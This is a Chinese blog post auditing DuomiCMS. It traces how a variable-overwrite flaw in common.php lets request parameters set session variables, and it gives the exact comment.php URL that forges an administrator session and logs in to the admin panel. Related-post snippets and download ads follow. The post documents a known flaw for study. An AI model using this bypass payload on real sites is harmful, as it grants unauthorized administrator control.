Duomicms变量覆盖

最新推荐文章于 2023-03-23 17:20:35 发布
最新推荐文章于 2023-03-23 17:20:35 发布
阅读量328 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46168828/article/details/105600306
版权

https://blog.csdn.net/weixin_43415644/article/details/94064059
https://www.cnblogs.com/Qiuzhiyu/p/11923471.html

先查看index.php

require_once ("duomiphp/common.php");
require_once duomi_INC."/core.class.php";
//站点状态

在duomiphp/common.php的变量覆盖漏洞

foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
	foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}

可以接受GET,POST,COOKIE这三种

foreach($_REQUEST as $_k=>$_v)
{
	if( strlen($_k)>0 && m_eregi('^(cfg_|GLOBALS)',$_k) && !isset($_COOKIE[$_k]) )
	{
		exit('Request var not allow!');
	}
}

有传参,正则匹配没有cfg_或GLOBALS,cookie没值
看它调用的函数,是对字符串进行转义

function _RunMagicQuotes(&$svar)
{
	if(!get_magic_quotes_gpc())
	{
		if( is_array($svar) )
		{
			foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
		}
		else
		{
			$svar = addslashes($svar);
		}
	}
	return $svar;
}

get_magic_quotes_gpc — 获取当前 magic_quotes_gpc 的配置选项设置
当 magic_quotes_gpc=On 时,
如果输入的数据有单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线。
当magic_quotes_gpc=Off 时,
系统不会自动对单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符增加反斜线,需要手工调用函数addslashes这个函数来为字符串增加转义。

查看login.php

require_once(dirname(__FILE__).'/../duomiphp/common.php');
require_once(duomi_INC."/check.admin.php");

去查看check.admin.php

var $keepUserIDTag = "duomi_admin_id";
	var $keepgroupidTag = "duomi_group_id";
	var $keepUserNameTag = "duomi_admin_name";

	//php5构造函数
	function __construct($admindir='')
	{
		global $admin_path;
		if(isset($_SESSION[$this->keepUserIDTag]))
		{
			$this->userID = $_SESSION[$this->keepUserIDTag];
			$this->groupid = $_SESSION[$this->keepgroupidTag];
			$this->userName = $_SESSION[$this->keepUserNameTag];
		}

需要给session传值,使用$_SESSION需要先调用session_start,在interface/comment.php下

session_start();
require_once("../duomiphp/common.php");
require_once(duomi_INC.'/core.class.php');

要找给session传的值,全局搜索groupid,在admin_manager.php找到需要等于1获得管理员权限

function getManagerLevel($groupid)
{
	if($groupid==1){
		return "系统管理员";
	}else if($groupid==2){
		return "网站编辑员";
	}else{
		return "未知类型";
	}
}

interface/comment.php?_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_id]=1&_SESSION[duomi_admin_name]=admin
在这里插入图片描述
去后台(默认/admin)可以直接登录
在这里插入图片描述

ssion_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
多米cmsduomicms变量覆盖漏洞(超详细)
kiwi的博客
11-01 824
本文章我借鉴了代码审计实战 - FreeBuf网络安全行业门户的文章,文章写的比较详细,大家也可以看看他写的文章。
【网络安全】Duomicms变量覆盖漏洞从白盒测试到实战
HBohan的博客
04-22 1769
声明:本次实践是在合法授权情况下进行,数据已经全部加密,主要是提供思路交流学习,请勿用于任何非法活动,否则后果自负。 本地代码走查 本次白盒代码测试的cmsDuomiCms,这次使用Seay工具进行代码审查,下载DuomiCms源码,然后工具加载。 先全局搜索危险函数,依次排查; extract();//把数组编程变量 parser_str();//把字符串变成变量 $$; //可变变量,将变量的值读出来然后再赋值为变量 在函数定位后,在文件中依次寻找有通用性的文件后缀内容,如下所示; //此类后.
Duomicms_X2.0变量覆盖通杀漏洞复现
seek_2022的博客
07-13 1650
出于学习和技术分享的目的撰写了本文,希望能给读者们学习挖掘此类漏洞提高一点参考。
DuomiCms x3.0前台duomiphpajax.php SQL注入漏洞审计复现
RestoreJustice的博客
03-23 238
语句使用了拼接,而拼接用的变量又多数是全局变量,我们在前面的代码执行漏洞中,提到程序有注册变量的行为,这样容易造成变量覆盖。拼接在SQL语句的末尾,且没有被引号包裹。非常好利用,但是对id变量进行了类型判断,必须是数字,所以没办法直接利用。变量,该变量为全局变量,可以由用户控制,而且其位置在SQL语句最后,两边也没有引号包裹,很好利用。语句,会先经过下面的正则,这里过滤了一些特殊语法,不允许我们使用联合查询。变量在SQL语句中被引号包裹了,如果引入注释符号话,会触发。来代替,最后取第二个引号之后的内容给。
Duomicms变量覆盖漏洞
B_roin的博客
04-19 590
变量覆盖 1.变量覆盖是指可以用我们的传参值替换程序原有的变量值 2.经常导致变量覆盖漏洞场景有:$$(可变变量)使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局变量注册等 1 . extract()函数:从数组中将变量导入到当前的符号表 (来源:菜鸟教程) [该函数使用数组键名作为变量名,使用...
DuoMiCms资源采集插件 v3.1
12-04
DuoMiCms资源采集插件是一个基于多米cms影视管理系统,而进行开发的自动采集插件。 重要提示: 200在线资源和C值部分需要解析。... 使用说明: 将文件api.php 覆盖至admin文件夹即可! DuoMiCms资源采集
DuoMiCms资源采集插件 v2.0
12-05
DuoMiCms资源采集插件是一个基于多米cms影视管理系统,而进行开发的自动采集插件。
duomicms代码审计1
08-03
1、可以快速浏览完系统运的代码顺序、 2、了解系统各件功能、 3、了解系统整个录的分布情况 1、外部变量的检测和转义 2、webscan.php件【做了次过滤后
DuomiCms 多米影视管理系统 X2.0
11-27
DuomiCms采用PHP+MYSQL架构原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其
多米(DuomiCms)影视管理系统 X1.1
11-27
DuomiCms采用PHP+MYSQL架构原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其
多米(DuomiCms)影视管理系统PHP版X2.0
07-25
DuomiCms采用PHP MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持主分类,扩展分类,剧情分类三种分类方式,让网站内容与众不同。简单易用丰富的模板标签,方便网站模
php _runmagicquotes,PHP函数第30款:转义字符函数_RunMagicQuotes
weixin_39572168的博客
03-11 309
一:函数简介此函数的作用是为所有的 ' (单引号), \" (双引号), \\ (反斜线) and 空字符和以会自动转为含有反斜线的转义字符。二:函数源码该函数的作用指的是:1、如果没有启用魔术引号 get_magic_quotes_gpc ,才会执行下边对数组和字符串的转义。当然,如果启用了就不使用该函数了。2、下边遇到数组,遍历数组取值;3、如果遇到字符串>0并且不含 cfg_|GLOB...
[zkaq靶场]变量覆盖--duomi cms通杀漏洞
wwxxee
05-12 984
变量覆盖 变量覆盖:值我们可以用我们的传参值去替换程序原有的变量值。 经常导致变量覆盖漏洞场景有: $$使用不当; extract()函数使用不当; parse_str()函数使用不当; import_request_variables()使用不当,开启了全局变量注册等。 $$ 导致的变量覆盖问题在CTF代码审计题目中经常在foreach中出现,如以下的示例代码,使用foreach来遍历数组中的值,然后再将获取到的数组键名作为变量,数组中的值作为变量的值。因此就产生了变量覆盖漏洞。 例如: <?php
代码审计duomicms变量覆盖漏洞
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-16 653
变量覆盖漏洞 什么是变量覆盖变量覆盖指的是可以用我们的传参值替换程序原有的变量值 如下 <?php $a=123; $a=1; echo $a; ?> 怎么去寻找变量覆盖? 经常导致变量覆盖漏洞场景有: $$使用不当,extract()函数使用不当,parse_str()函数使用不当import_request_variables()使用不当,开启了全局变量注册等。 经常引发变量覆盖漏洞的函数有:extract() parse_str() import_request_variab
DuomiCms
qq_45835337的博客
04-19 523
根据观察,管理用户界面是admin.php,于是打开 require_once(dirname(__FILE__).'/../duomiphp/common.php'); require_once(duomi_INC."/check.admin.php"); if(empty($dopost)) { $dopost = ''; } //检测安装目录安全性 if( is_dir(dirname(_...
pyzmq-26.0.0a2-pp38-pypy38_pp73-macosx_10_9_x86_64.whl
最新发布
06-18
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
小程序版通过CNN卷积神经网络的人物表情识别-不含数据集图片-含逐行注释和说明文档.zip
06-18
本代码是基于python pytorch环境安装的。 下载本代码后,有个环境安装的requirement.txt文本 如果有环境安装不会的,可自行网上搜索如何安装python和pytorch,这些环境安装都是有很多教程的,简单的 环境需要自行安装,推荐安装anaconda然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本 首先是代码的整体介绍 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01数据集文本生成制作.py,是将数据集文件夹下的图片路径和对应的标签生成txt格式,划分了训练集和验证集 运行02深度学习模型训练.py,
php语言入门教程-自学笔记
06-18
PHP(Hypertext Preprocessor)是一种广泛使用的服务器端脚本语言,特别适用于Web开发。以下是关于PHP的简介,内容将按照分点表示和归纳的方式呈现: 起源与发展: PHP最初由Rasmus Lerdorf在1994年创建,最初只是用于统计他自己网站访问者数量的简单程序。 1995年,PHP发布了第一个版本PHP1,并逐渐增加了对数据库的支持等功能。 经过多年的发展,PHP经历了多个版本的迭代,如PHP2、PHP3、PHP4、PHP5、PHP7和PHP8等。 每一次的版本更新都带来了性能提升、功能增强和语法的改进。
华为HCIA-WLAN 3.0 课程视频(38 WLAN配置应用-Web.mp4)
06-18
适用于参加华为HCIA-WLAN考核的技术人员。 最新3.0 课程视频,一共59集。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值